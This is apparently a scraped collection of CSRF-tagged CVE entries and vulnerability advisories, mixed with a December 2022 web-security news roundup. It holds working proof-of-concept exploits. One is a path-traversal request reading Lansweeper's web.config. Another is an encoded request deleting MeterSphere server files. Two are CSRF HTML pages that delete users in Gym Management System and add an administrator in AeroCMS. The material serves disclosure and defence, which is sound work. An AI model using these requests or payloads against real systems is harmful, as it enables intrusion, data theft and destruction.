The Registration Forms WordPress plugin before 3.8.1.3 does not have authorisation and CSRF when deleting users via an init action handler, allowing unauthenticated attackers to delete arbitrary users (along with their posts)

CVE-2022-4024

The Popup Manager WordPress plugin through 1.6.6 does not have authorisation and CSRF check when creating/updating popups, and is missing sanitisation as well as escaping, which could allow unauthenticated attackers to create arbitrary popups and add Stored XSS payloads as well

CVE-2022-4125

The Popup Manager WordPress plugin through 1.6.6 does not have authorisation and CSRF checks when deleting popups, which could allow unauthenticated users to delete them

CVE-2022-4124

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

John Leyden 16 December 2022 at 17:43 UTC

Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news

Our second web security roundup begins with news that a brace of network security flaws in products from Fortinet and Citrix have each come under active attack.

These attacks were respectively enabled by memory corruption vulnerabilities in the FortiOS SSL-VPN as well as a critical arbitrary code execution risk in Citrix ADC and Citrix Gateway (CVE-2022-27518). It’s unclear whether these assaults are linked, but their occurrence can still be said to underline the importance of patching SSL VPN devices, which have previously been vectors for pushing ransomware onto enterprise networks, among other attacks.

Uber this week suffered a data breach as a result of a cybersecurity incident at a third-party vendor, resulting in the exposure of employees’ personal information. The incident represents only the latest security breach to impact the ride-hailing app firm, which was previously faulted for the delayed disclosure of a 2016 breach that exposed the account records of customers and drivers. More recently, back in September, Uber’s internal IT systems were breached by a social engineering attack.

Over at Black Hat Europe, security researcher Nitesh Dhanjani discussed the impact of floor prices of non-fungible token (NFT) collections and how attacks focused on business dynamics have the potential to wreak havoc on marketplaces. Dhanjani also spoke about off-chain and on-chain sync algorithms, and how the disparities between the two blockchain-related environments can be abused.

I also attended the event for The Daily Swig, reporting on a keynote in which security researcher Daniel Cuthbert said the industry’s fixation on zero-day vulnerabilities was only a partial solution to making the internet fundamentally secure. We also covered some of the top hacking tools from the event.

Among other stories on The Daily Swig in recent days was an Akamai WAF bypass via Spring Boot, SQL injection payloads being smuggled past WAFs, and a crypto maintainer rejecting a bogus cryptocurrency ‘vulnerability’ submitted with the help of ChatGPT.

Here are some other web security stories and other cybersecurity news that caught our attention in the last fortnight:

**Web vulnerabilities**

*   Apache CXF / Critical / SSRF (server-side request forgery) vulnerability in parsing the href attribute of XOP / Disclosed with patch, December 13
*   Grails Spring Security Core plugin / CVE-2022-41923 / Critical / “Vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint” / Disclosed with patch, November 22
*   Microsoft .NET / CVE-2022-41089 / Critical / “Malicious actor could cause a user to run arbitrary code as a result of parsing maliciously crafted xps files” / Disclosed with a patch, December 13
*   Ping / CVE-2022-23093 / Memory-handling vulnerability involving networking protocol implementation by FreeBSD prompted its developers to test their own software, which unearthed a flaw in OpenBSD’s implementation of Ping that dates back to software changes introduced 24 years ago
*   Planet eStream / Critical / Vulnerabilities in video platform geared towards online learning enable attackers to take over user accounts with administrative privileges and execute arbitrary JavaScript code, among other attacks / Vendor has released software updates

**Research and attack techniques**

*   A researcher documented how it’s possible to exploit misconfigurations in cross-origin resource sharing (CORS) – a mechanism to control access to restricted website resources from external domains – to run various attacks. CORS misconfiguration issues have historically been downplayed but can seemingly be exploited to bypass CSRF protections or run cross-site tracking (XST) attacks.
*   Lightspin uncovered a serious flaw in an AWS-hosted service that allows software developers to find and share public container images. Attackers could potentially delete all images in the AWS Elastic Container Registry (ECR) Public Gallery or update image contents to inject malicious code, prompting AWS to resolve the problem within a day of its disclosure.
*   A series of flaws in three popular applications that allows an Android device to be used as a remote keyboard and mouse were exposed by Synopsys Cybersecurity Research Center (CyRC) The authentication, authorization, and insecure communication flaws potentially opened up attacks including keystroke sniffing.
*   Supposedly ‘air-gapped’ networks without direct access to the internet often require DNS services in order to resolve a company’s internal DNS records – a weakness potential hackers might be able to exploit, as a blog post by Pentera explains.
*   SALT Labs used a LEGO\-run site as a testbed to illustrate the general risk posed by API security issues. Researchers uncovered a variety of API-related security issues in LEGO’s Brick Lane, including a potential vector to internal production data and systems or manipulating users into surrendering control of their accounts.

LEGO reportedly fixed a number of API security issues found by SALT Labs

**Bug bounty / vulnerability disclosure**

*   HackerOne revealed that cloud-based vulnerabilities account for a growing proportion of vulnerabilities reported by bug bounty hunters, now totalling 65,000 in 2022, a year-on-year rise of 21%.
*   A security researcher who discovered a means to achieve unauthorized access to resumes stored on LinkedIn may have been left underwhelmed by the $5,000 bounty he received for his find, given the potential impact of the issue on users of the Microsoft-owned business-focused social network. An Insecure Direct Object Reference (IDOR) security vulnerability, inadvertently introduced in October 2022, could have allowed recruiters and perhaps more unsavoury parties to download resumes without permission.
*   Swedish video surveillance giant Axis Communications has launched a private bug bounty program with Bugcrowd.

**New open source infosec/hacking tools**

*   Node Security Shield – a defensive tool that takes an allow-listing approach to protecting zero-day protection for NodeJS applications. The tool was inspired by the infamous Log4Shell vulnerability, a zero-day vulnerability in Log4j, a popular Java logging framework.
*   Invoke-DNSteal – allows pen testers to perform file transfers using the DNS protocol as a covert communications channel.
*   Kubeshark – API Traffic Viewer for Kubernetes, providing “deep visibility and monitoring of all API traffic and payloads going in, out and across containers and pods inside a Kubernetes cluster”

**For devs**

*   Google has announced a free-of-charge scanner that allows open source developers to check their software projects for vulnerable dependencies. The tool – called OSV-Scanner – builds on Google’s work in developing an open source vulnerability database.
*   OWASP, best known for its ‘Top 10 Web Application Security Risks’ framework, is backing the creation of a similar scheme to index classes of security risks in the world of AppSec and DevSecOps. The Top 10 CI/CD Security Risks taxonomy aims to catalogue risks in the CI/CD pipeline. “Insufficient Flow Control Mechanisms” topped the nascent list.
*   The SHA-1 cryptographic algorithm, in use since 1995, has reached the end of its useful life, announced the National Institute of Standards and Technology (NIST), which says the federal government should phase out its use by 2030.
*   Research from Endor Labs found that the vast majority (95%) of all vulnerabilities are “found in transitive dependencies – open source code packages that are not selected by developers, but indirectly pulled into projects”.

**For fun**

ChatGPT – the artificial intelligence chat tool from OpenAI – is the hottest thing in infosec-focused social media circles just now. Rather than suggesting possible vulnerabilities in code we wondered what ChatGPT could conjure when asked to write lyrics for a song about SQL injection in the style of the late David Bowie.

The results were more than satisfactory:

In the realm of computers, where data flows like a stream  
There are those that seek to exploit and cause us all to scream  
They are the hackers, the codebreakers, the malicious ones  
And among their favorite trick is the art of SQL injection

Chorus:

SQL injection, SQL injection  
A dangerous game, a digital infection  
SQL injection, SQL injection  
Beware of the hackers and their devious invention

To paraphrase the great man himself, I still don’t know what I was waiting for... but it definitely wasn’t this.

RECOMMENDED Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

Deserialized web security roundup – Fortinet, Citrix bugs; another Uber breach; hacking NFTs at Black Hat 

A directory traversal vulnerability exists in the KnowledgebasePageActions.aspx ImportArticles functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the KnowledgebasePageActions.aspx ImportArticles functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Knowledgebase -> Import Articles and is located inside the \LS\WS\KnowledgebasePageActions.cs file. Let us take a close look at the vulnerable source code :

    Line 1 	private static void ImportArticles()
    Line 2 	{
    Line 3 		General.ValidateCsrf();
    Line 4 		HttpContext current = HttpContext.Current;
    Line 5 		string text = "";
    Line 6 		bool flag = false;
    Line 7 		HttpPostedFile httpPostedFile = current.Request.Files[0];
    Line 8 		string text2 = "";
    Line 9 		List<string[]> list = new List<string[]>();
    Line 10		current.Response.Clear();
    Line 11		int num = 0;
    Line 12		List<int> list2 = new List<int>();
    Line 13		Dictionary<int, string> dictionary = new Dictionary<int, string>();
    Line 14		List<int> list3 = new List<int>();
    Line 15		if (httpPostedFile.ContentLength > 0)
    Line 16		{
    Line 17			try
    Line 18			{
    Line 19				if (Path.GetExtension(httpPostedFile.FileName).ToLower() != ".csv")
    Line 20				{
    Line 21					text2 += "Only file extension .csv allowed.";
    Line 22					throw new CustomException(text2);
    Line 23				}
    Line 24				using (Stream stream = httpPostedFile.InputStream)
    Line 25				{
    Line 26					list = General.ParseCSV(stream, -1);
    Line 27				}		
    Line 28				string category = list[0][0].ToLower().Trim();
    Line 29				string title = list[0][1].ToLower().Trim();
    Line 30				string text3 = list[0][2].ToLower().Trim();
    Line 31				string file_attachments = list[0][3].ToLower().Trim();
    Line 35				if (!(category == "category") || !(title == "title") || !(file_attachments == "attachments") || !(text3 == "text"))
    Line 36				{
    Line 37					throw new ArgumentException("The CSV-file has a wrong format.");
    Line 38				}
    Line 39			(...)			
    Line 40			
    Line 41					for (int j = 1; j < list.Count; j++)
    Line 42					{
    Line 43						try
    Line 44						{
    Line 45							category = list[j][0];
    Line 46							title = HtmlSanitizer.SanitizeHtml(list[j][1]);
    Line 47							text3 = HtmlSanitizer.SanitizeHtml(list[j][2]);
    Line 48							file_attachments = list[j][3];
    Line 50							List<string> file_attachments_array = file_attachments.Split(new string[1] { "|" }, StringSplitOptions.RemoveEmptyEntries).ToList();
    Line 55							foreach (string file_path in file_attachments_array)
    Line 56							{
    Line 57								SaveImportFile(file_path, id);
    Line 58							}				
    Line 59		
    Line 60			(...)
    Line 61						private static void SaveImportFile(string filePath, int id)
    Line 62						{
    Line 63							General.ValidateCsrf();
    Line 64							int num = 0;
    Line 65							using (FileStream stream = File.OpenRead(filePath))
    Line 66							{
    Line 67								num = GlobalActions.SaveImage(stream);
    Line 68							}
    

The Import Articles functionality allows a user to upload a CSV formatted file with the following entries:

    Category,Title,Text,Attachments	
    

Where attachments can contain a path to the file located on the server, which should be copied and be available through the web interface as an integral part of imported article line 31. The lansweeper web interface suggests that a file pointed in such way should be available to the “Everyone” group on the server. Unfortunately, it is hard to find any privilege drop or privilege check before a pointed file is read. file_path is not sanitized, which gives the possibility to an attacker to read any file located on the server lines 55-68.

**Exploit Proof of Concept**

REQUEST

    POST /Knowledgebase/KnowledgebasePageActions.aspx?action=importarticles HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------376375159424554480053455199395
    Content-Length: 656
    Origin: http://192.168.0.102:81
    Connection: close
    Referer: http://192.168.0.102:81/Knowledgebase/KnowledgebaseOptions/ImportKnowledgebase.aspx
    Cookie: UserSettings=language=1; ASP.NET_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
    
    -----------------------------376375159424554480053455199395
    Content-Disposition: form-data; name="importFile"; filename="test.csv"
    Content-Type: text/csv
    
    Category,Title,Text,Attachments
    Lansweeper,SPECIAL2,Some description.,"c:\Program Files (x86)\Lansweeper\Website\web.config" 
    
    -----------------------------376375159424554480053455199395
    Content-Disposition: form-data; name="__RequestVerificationToken"
    
    WBGmiL05NSOQqPgcOXOfecOQiG9Std6V3tZBBrMAn3AGkU9n5BFgUrwIrtqFgqOCZJmDxAAusQvUTxBcjyuB67bKT2ra2w+zjMjHiP9cac/I2zGI16E9a5zXnIWBm+2TS2ni776KRYyWqd36Km1eqMOMraOXjhdv8hXXuf2PjMU=
    -----------------------------376375159424554480053455199395--
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: text/html; charset=utf-8
    Expires: -1
    Vary: Accept-Encoding
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Tue, 07 Jun 2022 15:58:27 GMT
    Connection: close
    Content-Length: 92
    
    { "error":false, "rowerrors" : [] , "message":"", "success":1, "failure":0, "failedRows":""}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-29511: TALOS-2022-1530 || Cisco Talos Intelligence Group

Helmet Store Showroom 1.0 is vulnerable to Cross Site Request Forgery (CSRF). An unauthenticated user can add an admin account due to missing CSRF protection.

CVE-2022-46074

MeterSphere is a one-stop open source continuous testing platform. Versions prior to 2.4.1 are vulnerable to Path Injection in ApiTestCaseService::deleteBodyFiles which takes a user-controlled string id and passes it to ApiTestCaseService, which uses the user-provided value (testId) in new File(BODY_FILE_DIR + "/" + testId), being deleted later by file.delete(). By adding some camouflage parameters to the url, an attacker can target files on the server. The vulnerability has been fixed in v2.4.1.

**Package**

maven io.metersphere:metersphere (Maven)

**Affected versions**

< 2.4.1

**Summary**

A Path Injection in ApiTestCaseService::deleteBodyFiles allows any authenticated user to delete arbitrary files on the server.

**Details**

Metersphere's ApiTestCaseController loads a /delete/{id} endpoint which takes a user-controlled string id and passes it to ApiTestCaseService's delete method.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/controller/definition/ApiTestCaseController.java#L127
@GetMapping("/delete/{id}")
...
public void delete(@PathVariable String id) {
    apiTestCaseService.delete(id);
}

ApiTestCaseService's delete method passes the former id (now testId) to ApiTestCaseService's deleteBodyFiles.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L331
public void delete(String testId) {
    ...
    deleteBodyFiles(testId);
    ...
}

Which uses the user-provided value (testId) in new File(BODY_FILE_DIR + "/" + testId), being deleted later by file.delete().

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L365
public void deleteBodyFiles(String testId) {
    File file = new File(BODY\_FILE\_DIR + "/" + testId);
    FileUtil.deleteContents(file);
    if (file.exists()) {
        file.delete();
    }
}

**Proof of Concept**

1.  Log in with an account (can be non-administrator)
2.  Create a file that the PoC will delete:

docker exec -it $(docker ps -q --filter "name=ms-server") touch /tmp/DELETE\_ME
docker exec -it $(docker ps -q --filter "name=ms-server") ls /tmp/DELETE\_ME

3.  Send the following request replacing the SESSION cookie and CSRF-TOKEN header:

    GET /api/testcase/delete/..%2F..%2F..%2F..%2Ftmp%2FDELETE_ME HTTP/1.1
    Host: 127.0.0.1:8081
    CSRF-TOKEN: <CSRF-TOKEN>
    Cookie: SESSION=<SESSION-COOKIE>
    

4.  Verify that the file was deleted:

docker exec -it $(docker ps -q --filter "name=ms-server") ls /tmp/DELETE\_ME

**Patches**

The vulnerability has been fixed in v2.4.1.

*   b5b4c51: No longer can arbitrary files be deleted.

**Workarounds**

It is recommended to upgrade the version to v2.4.1.

**For more information**

If you have any questions or comments about this advisory, please open an issue.

CVE-2022-23512: Path Injection in Metersphere leads to Arbitrary File Delete

Gym Management System v0.0.1 is vulnerable to Cross Site Request Forgery (CSRF).

Permalink

**delete\_user****Description**

Gym Management System has a vulnerability, Cross-site request forgery(CSRF).

This vulnerability may cause the modification of personal information such as administrator password. To exploit this vulnerability, a constructed HTML file needs to be opened.

**Exploit**

1.Login to admin panel -> View Users -> Delete.

2.Build a request package to add administrator information.

<html\>
  <!\-- CSRF PoC \- generated by Burp Suite Professional \--\>
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <form action\="http://localhost/MyGym/admin/index.php"\>
      <input type\="hidden" name\="delete&#95;user" value\="3" /\>
      <input type\="submit" value\="Submit request" /\>
    </form\>
  </body\>
</html\>

3.See that there are currently two users

4.Click on the constructed web page.

    http://localhost/MyGym/csrf.html
    

5.The account was successfully deleted

CVE-2022-46062: CVE/delete_user.md at master · rdyx0/CVE

AeroCMS v0.0.1 is vulnerable to Cross Site Request Forgery (CSRF).

Permalink

Cannot retrieve contributors at this time

**add\_user\_csrf****Description**

AeroCMS v0.0.1 has a vulnerability, Cross-site request forgery(CSRF). This vulnerability may cause the modification of personal information such as administrator password. To exploit this vulnerability, a constructed HTML file needs to be opened.

**Exploit**

1、Login to admin panel -> Users -> Add User.

2.  Build a request package to add administrator information.

<html\>
  <!\-- CSRF PoC \- generated by Burp Suite Professional \--\>
  <body\>
  <script\>history.pushState('', '', '/')</script\>
    <script\>
      function submitRequest()
      {
        var xhr \= new XMLHttpRequest();
        xhr.open("POST", "http:\\/\\/localhost\\/AeroCMS-0.0.1\\/admin\\/users.php?source=add\_user", true);
        xhr.setRequestHeader("Content-Type", "multipart\\/form-data; boundary=----WebKitFormBoundarydLYE4lYNAM12hDqt");
        xhr.setRequestHeader("Accept", "text\\/html,application\\/xhtml+xml,application\\/xml;q=0.9,image\\/avif,image\\/webp,image\\/apng,\*\\/\*;q=0.8,application\\/signed-exchange;v=b3;q=0.9");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
        xhr.withCredentials \= true;
        var body \= "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"username\\"\\r\\n" + 
          "\\r\\n" + 
          "111111\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"password\\"\\r\\n" + 
          "\\r\\n" + 
          "111111\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_firstname\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_lastname\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_email\\"\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_image\\"; filename=\\"\\"\\r\\n" + 
          "Content-Type: application/octet-stream\\r\\n" + 
          "\\r\\n" + 
          "\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"user\_role\\"\\r\\n" + 
          "\\r\\n" + 
          "Admin\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt\\r\\n" + 
          "Content-Disposition: form-data; name=\\"create\_user\\"\\r\\n" + 
          "\\r\\n" + 
          "Add User\\r\\n" + 
          "------WebKitFormBoundarydLYE4lYNAM12hDqt--\\r\\n";
        var aBody \= new Uint8Array(body.length);
        for (var i \= 0; i < aBody.length; i++)
          aBody\[i\] \= body.charCodeAt(i); 
        xhr.send(new Blob(\[aBody\]));
      }
    </script\>
    <form action\="#"\>
      <input type\="button" value\="Submit request" onclick\="submitRequest();" /\>
    </form\>
  </body\>
</html\>

3.View that there are currently only two users

4.Click on the constructed web page.

5.The new administrator account was successfully added

CVE-2022-46059: CVE/add_user_csrf.md at master · rdyx0/CVE

The Booster for WooCommerce WordPress plugin before 5.6.7, Booster Plus for WooCommerce WordPress plugin before 5.6.6, Booster Elite for WooCommerce WordPress plugin before 1.1.8 does not properly check for CSRF when creating and deleting Customer roles, allowing attackers to make logged admins create and delete arbitrary custom roles via CSRF attacks

Tag

#csrf